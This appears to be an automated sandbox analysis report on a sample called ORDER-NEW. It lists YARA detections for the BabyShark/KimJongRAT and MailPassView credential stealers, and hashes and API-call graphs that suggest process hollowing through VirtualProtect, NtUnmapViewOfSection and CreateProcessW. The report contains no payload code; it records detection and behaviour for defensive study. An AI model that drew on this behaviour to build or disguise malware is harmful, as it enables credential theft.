                                                                                                                                                                      File size:1171592 bytes
                                                                                                                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high


Execution Graph

Execution Coverage:14.8%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:8.6%
Total number of Nodes:58
Total number of Limit Nodes:3

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
Similarity
• API ID:
• String ID: ~$@
• API String ID: 0-3336456676
• Opcode ID: f4ce057abe15d3a6c0ee324d987020efcaa5e8e17aaedcbfb8b88cf023d548c7
• Instruction ID: f589903f9b92dc7123507187ccbe17c2ede12312e272a9f3b2a3e874d45b8811
• Opcode Fuzzy Hash: f4ce057abe15d3a6c0ee324d987020efcaa5e8e17aaedcbfb8b88cf023d548c7
• Instruction Fuzzy Hash: D6F10475E101198FDB14CF99C4909ADBBF2FF58710F25816AE915AB36AD331EC82CB84
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 66709761842dc3f3ab8a3c13479493ae560114774619347cc898e2e33e9f6b52
• Instruction ID: 87058ebe44bb179c2e7b7ac5bb0242f5849848ae04f25c26aac4f6fd5c3e6097
• Opcode Fuzzy Hash: 66709761842dc3f3ab8a3c13479493ae560114774619347cc898e2e33e9f6b52
• Instruction Fuzzy Hash: BA429B31A10605CFCB24CF68C5849AEFBF2FF98310B198669D516AB659D730F981CF94
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff1e0e4af33c865d88605775496cb0471ad92e27ee44fec29d70729d44a5738b
• Instruction ID: a1356d5ce7bdd5cde842789a96708fb950ae11a2d943e8a200b3458dc0c4ca02
• Opcode Fuzzy Hash: ff1e0e4af33c865d88605775496cb0471ad92e27ee44fec29d70729d44a5738b
• Instruction Fuzzy Hash: 79128E75E112199FCB14CFA8D5818AEBBF2FF99300F218165E615AB72AD730EC41CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 012163F8
• GetCurrentThread.KERNEL32 ref: 01216435
• GetCurrentProcess.KERNEL32 ref: 01216472
• GetCurrentThreadId.KERNEL32 ref: 012164CB
Memory Dump Source
• Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: a0b7194e31e7ea10045b1aaf96418ea60f10aaa6babb56140a9d343dfe5ab7e3
• Instruction ID: f492a9aec3182221f54c27a83cf431289391244ee8e59514a71418e6ae8fb691
• Opcode Fuzzy Hash: a0b7194e31e7ea10045b1aaf96418ea60f10aaa6babb56140a9d343dfe5ab7e3
• Instruction Fuzzy Hash: 8B5187B09003499FDB14CFA9C949BDEBFF5EF48314F24846AE419A7391DB789884CB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 012163F8
• GetCurrentThread.KERNEL32 ref: 01216435
• GetCurrentProcess.KERNEL32 ref: 01216472
• GetCurrentThreadId.KERNEL32 ref: 012164CB
Memory Dump Source
• Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 890680f2025f57d386a750b859362ff301407f7163a8fc6524b893f0face0e45
• Instruction ID: a35d3218ff0f95d7206ebac40e5d1164052b426762967a2fe493f2401fc3adad
• Opcode Fuzzy Hash: 890680f2025f57d386a750b859362ff301407f7163a8fc6524b893f0face0e45
• Instruction Fuzzy Hash: 7E5164B0900649DFDB14CFA9D548BDEBBF5EF48314F208469E419B7390DB785884CB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01216647
Memory Dump Source
• Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: e541e6e8aac3e4af6a6c26a3654c7d79a771309e881cc94614b51c97ce8bda35
• Instruction ID: c93cc6371e6f05b8d18ccde6152e4d745b3fa2f653d09b087862da2068f757a4
• Opcode Fuzzy Hash: e541e6e8aac3e4af6a6c26a3654c7d79a771309e881cc94614b51c97ce8bda35
• Instruction Fuzzy Hash: 0D414976900259DFCB01CF99D844ADEBFF9FB58310F14845AEA14A7360D335A954DFA0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 253 1217e97-1217e99 254 1217eb6-1217ef7 call 1216c5c 253->254 255 1217e9b-1217ea0 253->255 268 1217f02 254->268 269 1217ef9 254->269 256 1217ea2-1217eb5 255->256 257 1217f1a-1217fa2 SetProcessWorkingSetSize 255->257 256->254 262 1217fa4-1217faa 257->262 263 1217fab-1217fbf 257->263 262->263 268->257 269->268
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetProcessWorkingSetSize.KERNEL32(?,?,?), ref: 01217F95
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessSizeWorking
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3584180929-0
                                                                                                                                                                        • Opcode ID: 55a17648a42842166206e9fba3ba00bdb5c6ea04311e8c2cb78518ced7b00bc5
                                                                                                                                                                        • Instruction ID: 2b488645737743218976606eb3ec53736a252432362d5431f44e95d9b6ee0f11
                                                                                                                                                                        • Opcode Fuzzy Hash: 55a17648a42842166206e9fba3ba00bdb5c6ea04311e8c2cb78518ced7b00bc5
                                                                                                                                                                        • Instruction Fuzzy Hash: 8731AC71900209CFDB10CFA9C844BEEBBF4FB98324F104529E125A7390C7796944CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 270 1217308-121730b 272 1217310-1217372 OleInitialize 270->272 273 1217374-121737a 272->273 274 121737b-1217398 272->274 273->274
                                                                                                                                                                        APIs
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 01217365
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                        • Opcode ID: 24285ea3bb2d7dfe8212642abc082fa2e0fc3ba63a817021e8fc6b2f195221f3
                                                                                                                                                                        • Instruction ID: e8fbeaf73f9ceb98a6d5962a7d72d89af9bc5869283ef43f9855d71b174a2b15
                                                                                                                                                                        • Opcode Fuzzy Hash: 24285ea3bb2d7dfe8212642abc082fa2e0fc3ba63a817021e8fc6b2f195221f3
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C219F71910349CFDB20CF99D5457DAFBF8EF58324F14481EE946A3600D7B9A544CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 277 121ab52-121abca 281 121abd2-121abfd DeleteFileW 277->281 282 121abcc-121abcf 277->282 283 121ac06-121ac2e 281->283 284 121abff-121ac05 281->284 282->281 284->283
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 0121ABF0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                                                        • Opcode ID: c87a26b8af3a99916fceb44ea0d1b1fe09b7ef1fe3f8cb7035863c7620a5c14c
                                                                                                                                                                        • Instruction ID: 66b1a44c627b2441df0166b243b3572aba838b85f7a344167ea91a2aaa602f67
                                                                                                                                                                        • Opcode Fuzzy Hash: c87a26b8af3a99916fceb44ea0d1b1fe09b7ef1fe3f8cb7035863c7620a5c14c
                                                                                                                                                                        • Instruction Fuzzy Hash: A0219AB2C0529A8FCB10CFA9C540BDEBFF4FF59220F09856AD844A7241D738A945CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 287 1210d99-1210e21 VirtualProtect 291 1210e23-1210e29 287->291 292 1210e2a-1210e5a 287->292 291->292
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01210E14
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        • Opcode ID: d8cd09dcc974fe72019010584f7330c4cce077aca80241c07b312659dea3d9e7
                                                                                                                                                                        • Instruction ID: ecd69296e39396f0b7da8a66668225ae9d6e2259a8aa6120c26a89e251bf1597
                                                                                                                                                                        • Opcode Fuzzy Hash: d8cd09dcc974fe72019010584f7330c4cce077aca80241c07b312659dea3d9e7
                                                                                                                                                                        • Instruction Fuzzy Hash: AA2118718003499FCB10CFAAC4447EEBBF9FF58224F54882ED559A7240D7799A45DFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 296 12165b8 297 12165bd-1216654 DuplicateHandle 296->297 298 1216656-121665c 297->298 299 121665d-121667a 297->299 298->299
                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01216647
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: 00f2eb0526bf712416adfcdd95649cb14ffefd77694a9621eeb0bd565cfd02e0
                                                                                                                                                                        • Instruction ID: 90361f260bf5138564ffded640c634cb2a4c5ec0543bfd077babbfab88737e4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 00f2eb0526bf712416adfcdd95649cb14ffefd77694a9621eeb0bd565cfd02e0
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F21E4B5D00249DFDB10CFAAD584ADEBBF8FB58320F14842AE914A3350D378A954CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 302 12165c0-1216654 DuplicateHandle 303 1216656-121665c 302->303 304 121665d-121667a 302->304 303->304
                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01216647
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: 687ee5af0abd7b62e541bc763369e07961a9f3d852aa0ca32b202c0b93d29d2d
                                                                                                                                                                        • Instruction ID: 53205f143dc90c20235c9c232cf64efd5a5faf3aa96b083bbbcd590809b2a056
                                                                                                                                                                        • Opcode Fuzzy Hash: 687ee5af0abd7b62e541bc763369e07961a9f3d852aa0ca32b202c0b93d29d2d
                                                                                                                                                                        • Instruction Fuzzy Hash: C121E4B5900249DFDB10CF9AD884ADEBBF8FB58320F14842AE914A3350D378A944CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 307 1210da0-1210e21 VirtualProtect 310 1210e23-1210e29 307->310 311 1210e2a-1210e5a 307->311 310->311
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01210E14
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        • Opcode ID: 5391f3015c1e798933f4d70d9f72550ef2d9e4cb48aabe5be23b1062d7d97249
                                                                                                                                                                        • Instruction ID: aede4edee26ba0b539522f91c3a76f614cee263f5d897cb31fee8c7e507dbafb
                                                                                                                                                                        • Opcode Fuzzy Hash: 5391f3015c1e798933f4d70d9f72550ef2d9e4cb48aabe5be23b1062d7d97249
                                                                                                                                                                        • Instruction Fuzzy Hash: C92115718002098FCB10CFAAC484BEEBBF9FF58224F54882AD519A7240D7799945CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 0121ABF0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                                                        • Opcode ID: ca0e5f1f0d8a11569f97d0faf6b5b62dc9888a248ca0fabec8ec9d49865a908d
                                                                                                                                                                        • Instruction ID: 317e3dac64da81b0f8f643af95a2afa0bf5b7f7d6931073fc70c1ea8bf800cb0
                                                                                                                                                                        • Opcode Fuzzy Hash: ca0e5f1f0d8a11569f97d0faf6b5b62dc9888a248ca0fabec8ec9d49865a908d
                                                                                                                                                                        • Instruction Fuzzy Hash: 611136B1C0065A8BCB10CF9AC5447EEFBF4FF58324F14852AD918A7240D738AA44CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 01217365
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                        • Opcode ID: 89a781481097ca3dba0ee39e8897f5677586cf9908f63056ee3cd4b2676c4557
                                                                                                                                                                        • Instruction ID: 72eb59b2c53fd983f6ec59502e1ae1c48f579f2e85fb8b92f5bac5a2a19014a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 89a781481097ca3dba0ee39e8897f5677586cf9908f63056ee3cd4b2676c4557
                                                                                                                                                                        • Instruction Fuzzy Hash: 0611F2B19002498FCB10CF99D485BDEBBF8EB58224F14882AE919A7300D379A944CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetProcessWorkingSetSize.KERNEL32(?,?,?), ref: 01217F95
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessSizeWorking
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3584180929-0
                                                                                                                                                                        • Opcode ID: 716c8c867768acabfb7131c552ebfe2e3059afe9f57b6d93127a49521780d13e
                                                                                                                                                                        • Instruction ID: 39ff5259accd9f9931bb87cb39e77fa2374f1611a88698ad93a2e2c54b1e0454
                                                                                                                                                                        • Opcode Fuzzy Hash: 716c8c867768acabfb7131c552ebfe2e3059afe9f57b6d93127a49521780d13e
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C11F2B19002498FCB10CF9AD884BDEBBF8EB88324F108829E519A7240D375A944CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.729565047.00000000007F2000.00000040.00020000.sdmp, Offset: 007F0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.729557574.00000000007F0000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.729763591.00000000008A6000.00000002.00020000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7f0000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d05699cd0b703cc66974899fdfd70e8da199590175fe951099f4fd6dc5d0ecf0
                                                                                                                                                                        • Instruction ID: 3b24283a0b19096dd18f23107c5ea5d3d1c44586a5728ad64e752602fdc1c630
                                                                                                                                                                        • Opcode Fuzzy Hash: d05699cd0b703cc66974899fdfd70e8da199590175fe951099f4fd6dc5d0ecf0
                                                                                                                                                                        • Instruction Fuzzy Hash: C452FE6640F3D19FDB238B748CA5691BFB0EE5321471E46DBC4C1CF4A7E269684AC722
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 32573924bc2b216daea95fd380ac440766ce3743dec34dae957f8cd72ccd9ffa
                                                                                                                                                                        • Instruction ID: 9a0fa1966b0039a458054703402a59b60713814ebbd0b7385cbbe8d385ee92db
                                                                                                                                                                        • Opcode Fuzzy Hash: 32573924bc2b216daea95fd380ac440766ce3743dec34dae957f8cd72ccd9ffa
                                                                                                                                                                        • Instruction Fuzzy Hash: 6112A3B0C857668BE310CF66E9493853BA1B74572CF604B08D2693B2E1D7B9D1EACF44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e62698c02ebd5d1e5c6f51bf6ba537d9399ba10e0d47eb6de49be91c596d6368
                                                                                                                                                                        • Instruction ID: 359046e26a346cfed6c6cac52983049b79d5ea7a04d6ff3dce552b392552a066
                                                                                                                                                                        • Opcode Fuzzy Hash: e62698c02ebd5d1e5c6f51bf6ba537d9399ba10e0d47eb6de49be91c596d6368
                                                                                                                                                                        • Instruction Fuzzy Hash: 7AC108B1C917658BD710CF66E8493893BA1BB85328F204B08D2697B2E1D7B9D0E6CF44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:20.1%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:0.9%
                                                                                                                                                                        Total number of Nodes:222
                                                                                                                                                                        Total number of Limit Nodes:36

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 09E313C5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SectionUnmapView
                                                                                                                                                                        • String ID: y4i$
                                                                                                                                                                        • API String ID: 498011366-2620213625
                                                                                                                                                                        • Opcode ID: 76a945460697f744814124315efa1f2403c1cc038fd6ad5fd2d44e95386ca0f9
                                                                                                                                                                        • Instruction ID: d14a9c79301e3acd97af7b34982954d40db03380c7407edf2665206eafb7ddb0
                                                                                                                                                                        • Opcode Fuzzy Hash: 76a945460697f744814124315efa1f2403c1cc038fd6ad5fd2d44e95386ca0f9
                                                                                                                                                                        • Instruction Fuzzy Hash: 94F04970908269CFDF208B54C9887C9BBB1BB24348F54D4DED48AA7251D7B58EC5CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph: function at 9c3e678, calls GetCurrentProcess, GetCurrentThread, GetCurrentThreadId]
APIs
• GetCurrentProcess.KERNEL32 ref: 09C3E6D8
• GetCurrentThread.KERNEL32 ref: 09C3E715
• GetCurrentProcess.KERNEL32 ref: 09C3E752
• GetCurrentThreadId.KERNEL32 ref: 09C3E7AB
Memory Dump Source
• Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 44f840e6b7ebe504703a3962e267d3160e44ba091416e2fa38299e3aa92f3bb4
• Instruction ID: c623738d460973dc51d03f040c1b201a5b01681471cd5c7ddb439dfa100f1fdf
• Opcode Fuzzy Hash: 44f840e6b7ebe504703a3962e267d3160e44ba091416e2fa38299e3aa92f3bb4
• Instruction Fuzzy Hash: C45142B4900649CFDB10CFAAD588BDEBBF4BB48304F24C469E009A7390DB786944CF65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph: function at 9e3033c, calls CreateProcessW]
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 09E31D64
Memory Dump Source
• Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 8d8f329ab2219626316a3928d76016a4bfc7551a8549b28a386310d9d49359fb
• Instruction ID: 845dc299ecf8b2019585740c6e53fc54b8e75e2eaf555fd553cdf86e7adac0e2
• Opcode Fuzzy Hash: 8d8f329ab2219626316a3928d76016a4bfc7551a8549b28a386310d9d49359fb
• Instruction Fuzzy Hash: D0514671900269CFDF24CF99C984BDDBBB5BF48304F4084AAE909B7240DB759A89CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph: function at 9c3ccad, calls CreateWindowExW]
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 09C3CDCA
Memory Dump Source
• Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
